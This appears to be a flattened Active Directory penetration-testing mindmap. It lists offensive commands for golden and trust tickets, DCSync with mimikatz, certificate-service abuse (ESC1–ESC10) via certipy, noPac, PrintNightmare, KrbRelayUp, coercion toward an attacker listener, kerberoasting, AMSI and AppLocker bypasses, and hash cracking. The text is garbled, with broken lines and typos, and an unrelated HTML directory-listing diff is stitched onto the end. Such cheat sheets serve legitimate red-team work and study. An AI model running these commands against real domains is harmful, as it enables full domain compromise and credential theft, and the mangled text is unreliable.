ca -backup -ca '<ca_name>' -username <‎user>@<domain> -hashes <hash>‎certipy forge -ca-pfx <ca_private_key> -upn <‎user>@<domain> -subject 'CN=<user>,CN=‎Users,DC=<CORP>,DC=<LOCAL>‎DC shadow‎Acl manipulation‎...‎Trust relationship‎Enumeration‎nltest.exe /trusted_domains‎([System.DirectoryServices.ActiveDirectory.‎Domain]::GetCurrentDomain()).GetAllTrustRel‎ationships()‎Get-DomainTrust -Domain <domain>‎Get-DomainTrustMapping‎ldeep ldap -u <user> -p '<password>' -d <‎domain> -s ldap://<dc_ip> trusts‎Child Domain to Forest Compromise - extra SIDs‎(parent/child) (child/parent)‎Golden ticket‎Get-DomainSID -Domain <domain>‎Get-DomainSID -Domain <target_domain>‎mimikatz lsadump::dcsync /domain:<domain> /‎user:<domain>\krbtgt‎mimikatz kerberos::golden /user:Administrator /‎krbtgt:<HASH_KRBTGT> /domain:<domain> /‎sid:<user_sid> /sids:<RootDomainSID-519> /ptt‎lookupsid.py -domain-sids <domain>/<user>:'<‎password>'@<dc_ip> 0‎ticketer.py -nthash <child_krbtgt_hash> -domain-‎sid <child_sid> -domain <child_domain>‎ -extra-sid <parent_domain_sid>-519 goldenuser‎raiseChild.py <domain>/<user>:'<password>' ‎inter_realm_ticket TRUST (parent/child) (child/‎parent)‎mimikatz lsadump::trust /patch‎mimikatz kerberos::golden /user:Administrator /‎domain:<domain> /sid:<domain_sid> /aes256:<‎trust_key_aes256> /sids:<target_domain_sid>-‎519 /service:krbtgt /target:<target_domain> /ptt‎ticketer.py -nthash <trust_key> -domain-sid <‎child_sid> -domain <child_domain>‎ -extra-sid <parent_domain_sid>-519 -spn ‎krbtgt/<parent_domain> goldenuser‎getST.py -k -no-pass -spn cifs/<dc_fqdn> <‎parent_domain>/trustfakeuser@<parent_‎domain> -debug‎Breaking forest trust‎(printerbug or petitpotam to force the DC of the ‎external forest to connect on a local ‎unconstrained delegation machine. 
Capture TGT, ‎inject into memory and dcsync)‎ForeignGroupMember‎Users with foreign Domain Group Membership‎MATCH p=(n:User)-[:MemberOf]->(m:Group) ‎WHERE n.domain="<domain>" AND m.domain<>‎n.domain RETURN p‎Groups with Foreign Domain Group Membership‎MATCH p=(n:Group {domain:"<domain>"})-[:‎MemberOf]->(m:Group) WHERE m.domain<>n.‎domain AND n.name<>m.name RETURN p‎Get-DomainForeignGroupMember -Domain <‎target>‎convertfrom-sid <sid>‎User on both domains‎ACL‎password reuse‎Forest To Forest - extra SID‎(SID History / TREAT_AS_EXTERNAL)‎Golden ticket‎Get-DomainSID -Domain <domain>‎Get-DomainSID -Domain <target_domain>‎(SID filtering, Find group with SID > 1000)‎Get-DomainGroupMember -Identity "<group>" -‎Domain <target_domain>‎mimikatz lsadump::dcsync /domain:<domain> /‎user:<domain>\krbtgt‎mimikatz kerberos::golden /user:Administrator /‎krbtgt:<HASH_KRBTGT> /domain:<domain> /‎sid:<user_sid> /sids:<RootDomainSID>-<GROUP_‎SID_SUP_1000> /ptt‎ticketer.py -nthash <krbtgt_hash> -domain-sid <‎from_sid> -domain <from_domain>‎ -extra-sid <to_domain>-<group_id> ‎goldenuser //(group id must be > 1000)‎Trust ticket‎Get the trust ticket in the ntds (TARGET_‎DOMAIN$)‎ticketer.py -nthash <trust_key> -domain-sid <‎from_domain_sid> -domain <from_domain>‎ -extra-sid <to_domain>-<group_id> -spn ‎krbtgt/<to_domain> trustuser //(group id must ‎be > 1000)‎getST.py -k -no-pass -spn cifs/<dc_fqdn> <‎parent_domain>/trustfakeuser@<parent_‎domain> -debug‎Forest to Forest Compromise - MSSQL trusted ‎links‎Get-SQLServerLinkCrawl -username <user> -‎password <pass> -Verbose -Instance <sql_‎instance>‎mssqlclient.py -windows-auth <domain>/<‎user>:<password>@<ip> (pr #1397)‎trustlink‎sp_linkedservers‎use_link‎MSSQL‎Pass the ticket‎Uncontrained delegation‎lateral move (creds/pth/...)‎Pass the ticket‎Low access‎Get Applocker info‎Get-ChildItem -Path HKLM:\SOFTWARE\Policies\‎Microsoft\Windows\SrpV2\Exe (dll/msi/...)‎winpeas.exe‎AMSI bypass‎https://amsi.fail/‎Reflection method‎Patching amsi.dll‎search 
password files‎findstr /si 'password' *.txt *.xml *.docx‎User account‎clear text pass‎AppLocker (whitelisting) bypass‎use C:\Windows\Tasks‎use C:\Windows\Temp‎Powershell CLM bypass‎installutil.exe /logfile= /LogToConsole=false /U ‎C:\runme.exe‎mshta.exe my.hta‎MSBuild‎User Access Control (UAC) bypass‎FodHelper‎WSReset‎MSDT‎SMBGhost CVE-2020-0796‎CVE-2021-36934 (HiveNightmare/‎SeriousSAM)‎service account (IIS/Mssql) ‎(got SEImpersonate)‎RoguePotato‎Juicy Potato / Lovely Potato‎🔥 PrintSpoofer‎CertPotato‎./Rubeus tgtdeleg /nowrap‎TGT (pass the ticket)‎certipy req -k -ca <ca>‎ -template Machine -target <dc>‎certipy auth -pfx <pfxile>‎shadow credentials‎certipy shadow auto -u '<machine>$'@<‎domain> -k account '<machine$>'‎Machine NT Hash‎ticketer.py -nthash <hash> -domain-sid <‎domain_sid> -domain <domain> -spn cifs/<dc> <‎targetUser>‎🔥 KrbRelayUp‎.\KrbRelayUp.exe relay -Domain <domain> -‎CreateNewComputerAccount -ComputerName <‎computer$> -ComputerPassword <password>‎./KrbRelayUp.exe spawn -m rbcd -d <omdain> -‎dc <dc> -cn <computer_name>-cp <omputer_‎pass>‎...‎Admin Access‎Low access (without applocker)‎Known vulnerabilities‎MS14-068‎FindSMB2UPTime.py <ip>‎rpcclient $> lookupnames <name>‎wmic useraccount get name,sid‎auxiliary/admin/kerberos/ms14_068_kerberos_‎checksum‎goldenPac.py -dc-ip <dc_ip> <domain>/<‎user>:'<password>'@<target>‎privexchange‎(CVE-2019-0724, CVE-2019-0686)‎python privexchange.py -ah <attacker_host_or_‎ip> <exchange_host> -u <user> -d <domain> -p <‎password>‎Coerce HTTP ->‎dom admin‎Admin‎🔥SamAccountName / nopac‎CVE-2021-42287/CVE-2021-42278‎scan‎cme smb <ip> -u <user> -p <password> -M ‎nopac‎.\noPac.exe -domain <domain> -user <user> -‎pass <pass> /dc <dc_fqdn> /mAccount <‎machine_account> /mPassword <machine_‎pass> /service cifs /ptt‎with impacket : addcomputer.py / addspn.py / ‎renameMachine.py / getTGT.py / ‎renameMachine.py / getST.py‎Pass the ticket‎DCSYNC‎DOM ADMIN‎Delete computer‎🔥PrintNightmare ‎(CVE-2021-1675 / 
CVE-2021-34527)‎CVE-2021-1675.py <domain>/<user>:<‎password>@<target> '\\<smb_server_ip>\<‎share>\inject.dll'‎🔥Certifried‎(CVE-2022-26923)‎(need ADCS)‎certipy account create -u <user>@<domain> -‎p '<password>' -user 'certifriedpc' -pass '‎certifriedpass' -dns '<fqdn_dc>'‎certipy req -u 'certifriedpc$'@<domain> -p '‎certifriedpass' -target <ca_fqdn> -ca <ca_‎name> -template Machine‎certipy auth -pfx <pfx_file> -username '<dc>$' -‎domain <domain> -dc-ip <dc_ip>‎Pass the ticket‎DCSYNC‎DOM ADMIN‎Delete computer‎Admin‎Pass the ticket‎dom admin‎Admin‎ADCS weak configuration‎ Web enrollement is up‎🔥ESC8‎ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.‎asp -debug -smb2support --adcs --template ‎DomainController‎Rubeus.exe asktgt /user:<user> /certificate:<‎base64-certificate> /ptt‎gettgtpkinit.py -pfx-base64 $(cat cert.b64) <‎domain>/<dc_name>$ <ccache_file>‎certipy relay -ca <ca_ip> -template ‎DomainController‎certipy auth -pfx <certificate> -dc-ip <dc_ip>‎Pass the ticket‎DCSync‎DomAdmin‎Get templates information ‎ certutil -v -dsTemplate‎ certify.exe find [ /vulnerable]‎ certipy find -u <user>@<domain> -p <‎password> -dc-ip <domaincontroller>‎Misconfigured Certificate Templates‎ESC1 (Request a certificate from a vulnerable ‎template)‎certipy req -u <user>@<domain> -p <‎password> -target <ca_server> -template '<‎vulnerable template name>' -ca <ca_name> -‎upn <target_user>@<domain>‎certify.exe request /ca:<server>\<ca-name> /‎template:"<vulnerable template name>" [/‎altname:"Admin"]‎Pass the certificate‎ESC2‎ESC3 (Use an enrollement agent to request a ‎certificate)‎certify.exe request /ca:<server>\<ca-name> /‎template:"<vulnerable template name>"‎certify.exe request request /ca:<server>\<ca-‎name> /template:<template> /onbehalfof:<‎domain>\<user> /enrollcert:<path.pfx> [/‎enrollcertpw:<cert-password>]‎certipy req -u <user>@<domain> -p <‎password> -target <ca_server> -template '<‎vulnerable template name>' -ca <ca_name>‎certipy req -u <user>@<domain> -p <‎password> -target 
<ca_server> -template '<‎vulnerable template name>' -ca <ca_name> -on-‎behalf-of '<domain>\<user>' -pfx <cert>‎Pass the certificate‎getACL information‎ certipy find -u <user>@<domain> -p <‎password> -dc-ip <domaincontroller>‎Misconfigured ACL‎ESC4‎write privilege over a certificate template‎certipy template -u <user>@<domain> -p '<‎password>' -template <vuln_template> -save-‎old -debug‎ESC1 on vulnerable template‎restore template‎certipy template -u <user>@<domain> -p '<‎password>' -template <vuln_template> -‎configuration <template>.json‎ESC7‎Manage CA‎certipy ca -ca <ca_name> -add-officer '<user>' -‎username <user>@<domain> -password <‎password>‎Manage certificate‎certipy ca -ca <ca_name> -enable-template '<‎ecs1_vuln_template>'-username <user>@<‎domain> -password <password>‎certipy req -username <user>@<domain> -‎password <password> -ca <ca_name> -‎template '<vulnerable template name>' -upn '<‎target_user>'‎error, but save private key‎Issue request‎certipy ca -u <user>@<domain> -p '<‎password>' -ca <ca_name> -issue-request <‎request_id>‎certipy req -u <user>@<domain> -p '<‎password>' -ca <ca_name> -retreive <request_‎id>‎Pass the certificate‎Display CA information‎ certutil -TCAInfo‎ certify.exe cas‎Get CA flags (if remote registry is enabled)‎ certutil -config "CA_HOST\CA_NAME" -getreg "‎policy\EditFlags"‎certipy / certify.exe (only the flag ‎ATTRIBUTESUBJECTALTNAME2)‎Misconfigured CA‎ESC6 ‎Abuse ATTRIBUTESUBJECTALTNAME2 flag set ‎on CA‎you can choose any certificate template that ‎permits client authentication‎ESC1‎Get PKI objects information‎ certify.exe pkiobjects‎vulnerable PKI Object access control‎ESC5‎ACL‎Misconfigured Certificate Mapping ‎(blind test)‎ESC9/ESC10‎certipy shadow auto -username <accountA>@<‎domain> -p <passA> -account <accountB>‎ESC9/ESC10 (Case 1)‎certipy account update -username <‎accountA>@<domain> -password <passA> -‎user <accountB> -upn Administrator‎ESC9‎certipy req -username <accountB>@<domain> -‎hashes <hashB> -ca <ca_name> 
-template <‎vulnerable template>‎ESC10 (Case 1)‎certipy req -username <accountB>@<domain> -‎hashes <hashB> -ca <ca_name> -template <any ‎template with client auth>‎ESC10 (Case 2)‎certipy account update -username <‎accountA>@<domain> -password <passA> -‎user <accountB> -upn '<dc_name$>@<domain>'‎Reset accountB UPN‎certipy account update -username <‎accountA>@<domain> -password <passA> -‎user <accountB> -upn <accountB>@<domain>‎[Kerberos Mapping] ESC9/ESC10(Case 1)‎[Schannel Mapping] ESC9/ESC10 (Case 2) ‎Pass the certificate‎Kerberos Delegation‎list delegations‎ldeep ldap -u <user> -p '<password>' -d <‎domain> -s ldap://<dc_ip> delegations‎findDelegation.py <domain>/<user>:<‎password>@<ip>‎Unconstrained delegation‎Get unconstrained delegation machines‎Get-NetComputer -Unconstrained‎Get-DomainComputer -Unconstrained -‎Properties DnsHostName‎MATCH (c:Computer {unconstraineddelegation:‎true}) RETURN c‎MATCH (u:User {owned:true}), (c:Computer {‎unconstraineddelegation:true}), p=shortestPath((‎u)-[*1..]->(c)) RETURN p‎UAC: ADS_UF_TRUSTED_FOR_DEL‎EGATION‎Get tickets‎privilege::debug sekurlsa::tickets /export ‎sekurlsa::tickets /export‎Rubeus dump /service:krbtgt /nowrap‎Rubeus dump /luid:0xdeadbeef /nowrap‎(Force_connection_with_coerced_auth)‎Rubeus monitor /interval:5‎Kerberos TGT‎Kerberos TGT‎Pass The Ticket‎if dc‎DCSync‎DomAdmin‎Constrained delegation‎Get constrained delegation‎Get-DomainComputer -TrustedToAuth -‎Properties DnsHostName, MSDS-‎AllowedToDelegateTo‎Get-DomainUser -TrustedToAuth‎MATCH (c:Computer), (t:Computer), p=((c)-[:‎AllowedToDelegate]->(t)) RETURN p‎MATCH (u:User {owned:true}), (c:Computer {‎name: "<MYTARGET.FQDN>"}), p=shortestPath((‎u)-[*1..]->(c)) RETURN p‎With protocol transition (any)‎Object: msDS-AllowedToDelegateTo‎UAC: TRUST_TO_AUTH_FOR_DELEGA‎TION‎Rubeus hash /password:<password>‎Rubeus asktgt /user:<user> /domain:<domain> /‎aes256:<AES 256 hash>‎Rubeus s4u /ticket:<ticket> /impersonateuser:<‎admin_user> /msdsspn:<spn_constrained> 
/‎altservice:CIFS /ptt‎Altservice‎HOST‎psexec \\\<target> <cmd>‎HTTP‎Enter-Pssession -computername <target>‎Invoke-Command <target> -Scriptblock {<cmd>}‎CIFS‎dir \\<target>\c$‎LDAP‎Kerberos TGS‎Without protocol transition (kerberos only)‎Object: msDS-AllowedToDelegateTo‎UAC: TRUSTED_FOR_DELEGATION‎RBCD‎addcomputer.py -computer-name '<rbcd_‎com>$' -computer-pass '<rbcd_compass>' -dc-‎ip <dc> '<domain>/<user>:<password>'‎rbcd.py -delegate-from '<rbcd_com>$' -‎delegate-to '<constrained>$' -dc-ip‎'<dc>' -action 'write' -hashes '<hash>'‎<domain>/<constrained>$‎getST.py -self -impersonate "administrator" -dc-‎ip <ip> <domain>/<rbcd_com>$':'<rbcd_‎compass>'‎getST.py -spn host/<constrained> -hashes '' '<‎domain>/<computer_account>' -impersonate ‎Administrator --dc-ip <dc_ip> -additional-‎ticket <previous_ticket>‎getST.py -spn <constrained_spn>/<target> -‎hashes '<hash>' '<domain>/<constrained>$' -‎impersonate Administrator --dc-ip <dc_ip> -‎additional-ticket <previous_ticket>‎Kerberos TGS‎self RBCD‎Resource-Based Constrained Delegation ‎(RBCD)‎Object: msDS-‎AllowedToActOnBehalfOfOtherIdentit‎rubeus.exe hash /password:<computer_pass> /‎user:<computer> /domain:<domain>‎rubeus.exe s4u /user:<fake_computer$> /‎aes256:<AES 256 hash> /impersonateuser:‎administrator /msdsspn:cifs/<victim.domain.‎local> /altservice:krbtgt,cifs,host,http,winrm,‎RPCSS,wsman,ldap /domain:domain.local /ptt‎rbcd.py -delegate-from '<computer>$' -‎delegate-to '<target>$' -dc-ip‎'<dc>' -action 'write'‎<domain>/<user>:<password>‎getST.py -spn host/<dc_fqdn> '<domain>/<‎computer_account>:<computer_pass>' -‎impersonate Administrator --dc-ip <dc_ip>‎Kerberos TGT‎add computer account‎addcomputer.py -computer-name '<computer_‎name>' -computer-pass '<ComputerPassword>' -‎dc-host <dc> -domain-netbios <domain_‎netbios> '<domain>/<user>:<password>'‎Admin‎Got Account on the domain‎authenticated‎(cleartext pass / kerberos / NTLM)‎Get all users‎GetADUsers.py -all -dc-ip <dc_ip> <domain>/<‎username>‎cme smb <ip> -u 
<user> -p '<password>' --users ‎ldeep ldap -u <user> -p '<password>' -d <‎domain> -s ldap://<dc_ip> users‎Users‎enumerate SMB share‎cme smb <ip> -u <user> -p <password> --shares‎Account‎exploit smbshare‎cme smb <ip> -u <user> -p <password> -M ‎slinky -o NAME=<filename> SERVER=<ip>‎drop .url file‎Coerce SMB ->‎🔥bloodhound‎bloodhound-python -d <domain> -u <user> -p <‎password> -gc <dc> -c all‎./rusthound -d <domain_to_enum> -u '<user>@<‎domain>' -p '<password>' -o <outfile> -z‎import-module sharphound.ps1;invoke-‎bloodhound -collectionmethod all -domain <‎domain>‎sharphound.exe -c all -d <domain>‎enum ldap‎ldeep ldap -u <user> -p '<password>' -d <‎domain> -s ldap://<dc_ip> all <backup_folder>‎Powerview / SharpView‎adPeas‎pingcastle‎🔥kerberoasting‎Get kerberoastable users‎Get-DomainUser -SPN -Properties ‎SamAccountName, ServicePrincipalName‎MATCH (u:User {hasspn:true}) RETURN u‎MATCH (u:User {hasspn:true}), (c:Computer), p=‎shortestPath((u)-[*1..]->(c)) RETURN p‎Get hash‎GetUserSPNs.py -request -dc-ip <dc_ip> <‎domain>/<user>:<password>‎Rubeus kerberoast‎hash found (TGS)‎Enum dns ‎dnstool.py -u 'DOMAIN\user' -p 'password' --‎record '*' --action query <dc_ip>‎Scan network‎Enumerate AD CS ‎ 🔥 certipy find -u <user>@<domain> -p <‎password> -dc-ip <domaincontroller>‎Enumerate Azure AD connect‎find AAD connect server from MSOL description‎cme ldap <ip> -u <user> -p <password> -M get-‎desc-users | grep -i MSOL‎Coerce‎Webdav‎cme smb <ip> -u <user> -p <password> -M ‎webdav #find‎start webdav with Documents.searchConnector-‎ms file‎cme smb <ip> -u '<user>' -p '<pass>' -M drop-sc‎add attack computer in dns‎dnstool.py -u '<domain>\<user>' -p '<pass>' --‎record‎'<attack_name>' --action add --data <ip_listen> <‎dc_ip>‎coerce with <attacker_hostname>@80/‎something as target‎Coerce HTTP ->‎rpcdump.py <domain>/<user>:<password>@<‎domain_server> | grep MS-RPRN‎printerbug.py '<domain>/<username>:<‎password>'@<Printer IP> <listener_ip>‎PetitPotam.py -d <domain> -u <user>-p <‎password> 
<listener_ip> <target_ip>‎🔥coercer.py -u <user> -d <domain> -p <‎password> -t <target> -l <attacker_ip>‎Coerce SMB ->‎exploit !‎connect to computer‎ADCS‎Domain enum‎ACL‎Delegation‎Users‎Lateral move‎Known vulnerabilities‎Crack Hash‎LM‎john --format=lm hash.txt‎hashcat -m 3000 -a 3 hash.txt‎NTLM‎john --format=nt hash.txt‎hashcat -m 1000 -a 3 hash.txt‎NetNTLMv1‎john --format=netntlm hash.txt‎hashcat -m 5500 -a 3 hash.txt‎https://crack.sh/‎NetNTLMv2‎john --format=netntlmv2 hash.txt‎hashcat -m 5600 -a 0 hash.txt rockyou.txt‎Kerberos 5 TGS‎hashcat -m 13100 -a 0 spn.txt rockyou.txt‎john spn.txt --format=krb5tgs --wordlist=‎rockyou.txt‎Kerberos 5 TGS AES128‎hashcat -m 19600 -a 0 spn.txt rockyou.txt‎Kerberos 5 TGS AES256‎hashcat -m 19700 -a 0 spn.txt rockyou.txt‎Kerberos ASREP‎hashcat -m 18200 -a 0 AS-REP_roast-hashes ‎rockyou.txt‎MsCache 2 (slow)‎hashcat -m 2100 -a 0 mscache-hash rockyou.txt‎User account‎clear text pass
\ No newline at end of file
diff --git a/index.html b/index.html
index ddd8ca9..322ade4 100644
--- a/index.html
+++ b/index.html
@@ -40,123 +40,132 @@

Directory Listing

  • Reset-DockerWslIntegration.ps1
  • -
  • Documents/ +
  • EduDocuments/
  • -
  • References/ +
  • CheatSheets/
  • Useful-Repositories/ -
  • -
  • Web-Applications/ -